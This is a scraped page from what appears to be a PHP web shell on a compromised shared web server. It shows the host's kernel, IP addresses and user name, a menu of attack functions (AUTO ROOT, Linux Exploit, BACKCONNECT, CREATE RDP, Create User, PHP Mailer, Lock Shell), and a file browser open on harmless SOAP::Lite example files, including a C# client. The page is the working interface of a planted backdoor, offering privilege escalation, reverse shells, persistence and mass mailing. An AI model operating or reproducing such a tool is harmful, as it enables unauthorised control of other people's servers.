Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsoap-lite-perl /
examples /
COM /
[ HOME SHELL ]
Name
Size
Permission
Action
README.gz
2.48
KB
-rw-r--r--
SOAP-Lite-COM-minimal.ctrl
2.13
KB
-rw-r--r--
SOAP-Lite-COM-standalone.ctrl
2.4
KB
-rw-r--r--
hash.vbs
361
B
-rw-r--r--
hashecho.vbs
692
B
-rw-r--r--
local.vbs
269
B
-rw-r--r--
make-com-minimal.bat
107
B
-rw-r--r--
make-com-standalone.bat
113
B
-rw-r--r--
make-com.args
207
B
-rw-r--r--
remote.cs
980
B
-rw-r--r--
remote.vba
660
B
-rw-r--r--
remote.vbs
265
B
-rw-r--r--
remote.xls.gz
12.89
KB
-rw-r--r--
service.vbs
188
B
-rw-r--r--
soap.asp
478
B
-rw-r--r--
soap.vbs
525
B
-rw-r--r--
soap_perl.asp
481
B
-rw-r--r--
states.html
1.07
KB
-rw-r--r--
states.pl
368
B
-rw-r--r--
states.vba
613
B
-rw-r--r--
states.vbs
223
B
-rw-r--r--
states.xls.gz
11.97
KB
-rw-r--r--
temper.vbs
273
B
-rw-r--r--
xmlrpc.vbs
242
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : remote.cs
// -- SOAP::Lite -- soaplite.com -- Copyright (C) 2001 Paul Kulchenko -- // Lots of thanks to Tony Hong (xmethods.net) for provided help and examples // Connect to remote SOAP server using System; using System.Reflection; public class test { public static void Main() { Type typ = Type.GetTypeFromProgID("SOAP.Lite"); object obj = Activator.CreateInstance(typ); object soaplite = typ.InvokeMember("new",BindingFlags.InvokeMethod,null,obj,null); Object[] uri = {"urn:xmethodsInterop"}; Object[] proxy = {"http://services.xmethods.net:80/perl/soaplite.cgi"}; typ.InvokeMember("uri",BindingFlags.InvokeMethod,null,soaplite,uri); typ.InvokeMember("proxy",BindingFlags.InvokeMethod,null,soaplite,proxy); object [] input = {"Hello"}; object resultObject = typ.InvokeMember("echoString",BindingFlags.InvokeMethod,null,soaplite,input); Console.WriteLine(typ.InvokeMember("result",BindingFlags.InvokeMethod,null,resultObject,null)); } }
Close